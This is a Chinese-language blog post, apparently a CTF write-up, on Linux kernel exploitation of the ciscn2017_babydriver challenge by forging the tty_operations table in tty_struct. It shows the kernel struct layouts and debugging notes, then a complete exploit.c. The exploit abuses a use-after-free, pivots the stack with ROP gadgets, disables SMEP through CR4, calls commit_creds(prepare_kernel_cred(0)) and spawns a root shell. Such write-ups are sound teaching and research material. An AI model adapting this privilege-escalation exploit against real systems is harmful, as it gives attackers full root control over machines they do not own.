ha1vk's blog
0%

linux kernel pwn学习之伪造tty_struct执行任意函数

发表于 分类于

当用户打开ptmx驱动时,会分配一个tty_struct结构,它的结构如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
struct tty_struct {  
    int magic;  
    struct kref kref;  
    struct device *dev;  
    struct tty_driver *driver;  
    const struct tty_operations *ops;  
    int index;  
    /* Protects ldisc changes: Lock tty not pty */  
    struct ld_semaphore ldisc_sem;  
    struct tty_ldisc *ldisc;  
    struct mutex atomic_write_lock;  
    struct mutex legacy_mutex;  
    struct mutex throttle_mutex;  
    struct rw_semaphore termios_rwsem;  
    struct mutex winsize_mutex;  
    spinlock_t ctrl_lock;  
    spinlock_t flow_lock;  
    /* Termios values are protected by the termios rwsem */  
    struct ktermios termios, termios_locked;  
    struct termiox *termiox;    /* May be NULL for unsupported */  
    char name[64];  
    struct pid *pgrp;       /* Protected by ctrl lock */  
    struct pid *session;  
    unsigned long flags;  
    int count;  
    struct winsize winsize;     /* winsize_mutex */  
    unsigned long stopped:1,    /* flow_lock */  
              flow_stopped:1,  
              unused:BITS_PER_LONG - 2;  
    int hw_stopped;  
    unsigned long ctrl_status:8,    /* ctrl_lock */  
              packet:1,  
              unused_ctrl:BITS_PER_LONG - 9;  
    unsigned int receive_room;  /* Bytes free for queue */  
    int flow_change;  
    struct tty_struct *link;  
    struct fasync_struct *fasync;  
    wait_queue_head_t write_wait;  
    wait_queue_head_t read_wait;  
    struct work_struct hangup_work;  
    void *disc_data;  
    void *driver_data;  
    spinlock_t files_lock;      /* protects tty_files list */  
    struct list_head tty_files;  
#define N_TTY_BUF_SIZE 4096  
    int closing;  
    unsigned char *write_buf;  
    int write_cnt;  
    /* If the tty has a pending do_SAK, queue it here - akpm */  
    struct work_struct SAK_work;  
    struct tty_port *port;  
} __randomize_layout;

其中有一个**[const struct tty_operations *ops]{.mark}**指针,它是一个tty_operations指针,而tty_operations结构体里是一些列对驱动操作的函数指针。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
struct tty_operations {  
    struct tty_struct * (*lookup)(struct tty_driver *driver,  
            struct file *filp, int idx);  
    int  (*install)(struct tty_driver *driver, struct tty_struct *tty);  
    void (*remove)(struct tty_driver *driver, struct tty_struct *tty);  
    int  (*open)(struct tty_struct * tty, struct file * filp);  
    void (*close)(struct tty_struct * tty, struct file * filp);  
    void (*shutdown)(struct tty_struct *tty);  
    void (*cleanup)(struct tty_struct *tty);  
    int  (*write)(struct tty_struct * tty,  
              const unsigned char *buf, int count);  
    int  (*put_char)(struct tty_struct *tty, unsigned char ch);  
    void (*flush_chars)(struct tty_struct *tty);  
    int  (*write_room)(struct tty_struct *tty);  
    int  (*chars_in_buffer)(struct tty_struct *tty);  
    int  (*ioctl)(struct tty_struct *tty,  
            unsigned int cmd, unsigned long arg);  
    long (*compat_ioctl)(struct tty_struct *tty,  
                 unsigned int cmd, unsigned long arg);  
    void (*set_termios)(struct tty_struct *tty, struct ktermios * old);  
    void (*throttle)(struct tty_struct * tty);  
    void (*unthrottle)(struct tty_struct * tty);  
    void (*stop)(struct tty_struct *tty);  
    void (*start)(struct tty_struct *tty);  
    void (*hangup)(struct tty_struct *tty);  
    int (*break_ctl)(struct tty_struct *tty, int state);  
    void (*flush_buffer)(struct tty_struct *tty);  
    void (*set_ldisc)(struct tty_struct *tty);  
    void (*wait_until_sent)(struct tty_struct *tty, int timeout);  
    void (*send_xchar)(struct tty_struct *tty, char ch);  
    int (*tiocmget)(struct tty_struct *tty);  
    int (*tiocmset)(struct tty_struct *tty,  
            unsigned int set, unsigned int clear);  
    int (*resize)(struct tty_struct *tty, struct winsize *ws);  
    int (*set_termiox)(struct tty_struct *tty, struct termiox *tnew);  
    int (*get_icount)(struct tty_struct *tty,  
                struct serial_icounter_struct *icount);  
    void (*show_fdinfo)(struct tty_struct *tty, struct seq_file *m);  
#ifdef CONFIG_CONSOLE_POLL  
    int (*poll_init)(struct tty_driver *driver, int line, char *options);  
    int (*poll_get_char)(struct tty_driver *driver, int line);  
    void (*poll_put_char)(struct tty_driver *driver, int line, char ch);  
#endif  
    int (*proc_show)(struct seq_file *, void *);  
} __randomize_layout;

比如,我们对ptmx驱动进行write操作时,就会调用这个里面的write指针指向的函数。也就是,我们如果能**[伪造tty_operations结构体,将里面的指针指向我们需要执行的函数]{.mark}。然后将tty_struct结构体里的[const struct tty_operations *ops]{.mark}指针指向我们伪造的tty_operations结构体,然后对驱动执行对应的操作,比如write,就能触发函数的执行。[而tty_struct结构体,我们可以通过漏洞来控制]{.mark},然后修改指针。[这种思想,就如同是glibc下的house of orange]{.mark}**,house of orange是伪造vtable表,而我们这里,同样是伪造函数表。为了加深理解,我们以ciscn2017_babydriver为例,之前,我们利用UAF修改了cred结构,这次,我们用同样的方法,修改tty_struct结构。

ciscn2017_babydriver

阅读对应版本的linux内核源码,我们发现,tty_struct结构体的大小为0x2E0。[为了实现执行的目的,我们可以利用ROP]{.mark},但是本题没有栈溢出,我们可以**[伪造tty_operations里面对应的函数的来将栈转移到我们可以控制的地方]{.mark}**。为了清楚对应的函数被调用前的各个寄存器的值,以方便我们后续的分析,我们先将tty_operations[7]伪造为babydriver里的babyread函数的地址。查看结构体,tty_operations[7]也就是对驱动进行write操作时的处理函数的指针。我们现在把它伪造指向了babyread,然后利用gdb调试,对ptmx驱动执行write操作,在babyread函数前断点。

1
2
3
4
for (int i=0;i<35;i++) {  
   fake_tty_operations[i] = 0xffffffffc0000000 + i;  
}  
fake_tty_operations[7] = 0xffffffffc0000130;  //babyread的函数地址

然后,执行exp,在babyread下断了下来,我们查看各个寄存器的值,发现rax正好指向我们的fake_tty_operations,

因此,我们只需要把fake_tty_operations[7]伪造成gadgets

1
2
3
mov rsp,rax;  
...........  
ret

这样,我们对驱动执行write操作时,就能够将栈转移到我们用户的fake_tty_operations空间里,我们在这里面再布置一个栈转移的gadgets,将栈最终转移到我们的rop数组里,执行rop。

完成这些以后,就是常规ROP操作了。我们最终的exploit.c程序

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
#include <stdio.h>  
#include <stdlib.h>  
#include <unistd.h>  
#include <fcntl.h>  
#include <sys/ioctl.h>  
  
//tty_struct结构体的大小  
#define TTY_STRUCT_SIZE 0x2E0  
//mov cr4, rdi ; pop rbp ; ret  
#define MOV_CR4_RDI 0xffffffff81004d80  
//pop rdi ; ret  
#define POP_RDI 0xffffffff810d238d  
//swapgs ; pop rbp ; ret  
#define SWAPGS 0xffffffff81063694  
//iretq  
#define IRETQ 0xFFFFFFFF8181A797  
//commit_creds函数  
#define COMMIT_CREDS 0xffffffff810a1420  
// prepare_kernel_cred  
#define PREPARE_KERNEL_CRED 0xffffffff810a1810  
//mov rsp, rax;dec ebx;ret,做栈迁移用  
#define MOV_RSP_RAX 0xFFFFFFFF8181BFC5  
#define POP_RAX 0xffffffff8100ce6e  
  
void getRoot() {  
   //函数指针  
   void *(*pkc)(int) = (void *(*)(int))PREPARE_KERNEL_CRED;  
   void (*cc)(void *) = (void (*)(void *))COMMIT_CREDS;  
   //commit_creds(prepare_kernel_cred(0))  
   (*cc)((*pkc)(0));  
}  
  
void getShell() {  
   if (getuid() == 0) {  
      printf("[+]Rooted!!\n");  
      system("/bin/sh");  
   } else {  
      printf("[+]Root Fail!!\n");  
   }  
}  
  
size_t user_cs,user_ss,user_flags,user_sp;  
  
/*保存用户态的寄存器到变量里*/  
void saveUserState() {  
   __asm__("mov %cs,user_cs;"  
           "mov %ss,user_ss;"  
           "mov %rsp,user_sp;"  
           "pushf;"  
           "pop user_flags;"  
           );  
  puts("user states have been saved!!");  
}  
  
int main() {  
   //保存用户态寄存器  
   saveUserState();  
   int fd1 = open("/dev/babydev",O_RDWR);  
   int fd2 = open("/dev/babydev",O_RDWR);  
   if (fd1 < 0 || fd2 < 0) {  
      printf("open file error!!\n");  
      exit(-1);  
   }  
   //申请一个tty_struct大小的堆  
   ioctl(fd1,0x10001,TTY_STRUCT_SIZE);  
   //释放这个堆  
   close(fd1);  
   size_t rop[0x100];  
   int i = 0;  
   rop[i++] = POP_RDI;  
   rop[i++] = 0x6f0;  
   rop[i++] = MOV_CR4_RDI;  
   rop[i++] = 0;  
   rop[i++] = (size_t)getRoot;  
   rop[i++] = SWAPGS;  
   rop[i++] = 0;  
   rop[i++] = IRETQ;  
   rop[i++] = (size_t)getShell;  
   rop[i++] = user_cs;  
   rop[i++] = user_flags;  
   rop[i++] = user_sp;  
   rop[i++] = user_ss;  
  
   size_t fake_tty_operations[35];  
   /*for (int i=0;i<35;i++) { 
      fake_tty_operations[i] = 0xffffffffc0000000 + i; 
   }*/  
   //这个位置是write函数的指针,经过调试,我们发现当调用这个函数时,rax正好是fake_tty_operation的地址,于是,我们把栈转移到  
   //fake_tty_operations里  
   fake_tty_operations[7] = MOV_RSP_RAX;  
   //栈转移到fake_tty_operations里后,我们继续做一次转移,把转转移到我们的rop数组里,执行ROP  
   fake_tty_operations[0] = POP_RAX;  
   fake_tty_operations[1] = (size_t)rop;  
   fake_tty_operations[2] = MOV_RSP_RAX;  
  
   size_t fake_tty_struct[4];  
   //这个操作会申请tty_struct的空间,也就是会申请到我们之前释放的那个堆里,我们可以用fd2来对它操作  
   int fd_tty = open("/dev/ptmx", O_RDWR);  
   //我们先把原始的tty_struct前面的数据读出来,存储  
   read(fd2,fake_tty_struct,4*8);  
   //修改const struct tty_operations *ops;指针,指向我们伪造的tty_operations  
   fake_tty_struct[3] = (size_t)fake_tty_operations;  
   //把篡改过的tty_struct写回去  
   write(fd2,fake_tty_struct,4*8);  
   char buf[0x10];  
   write(fd_tty,buf,0x10);  
   return 0;  
}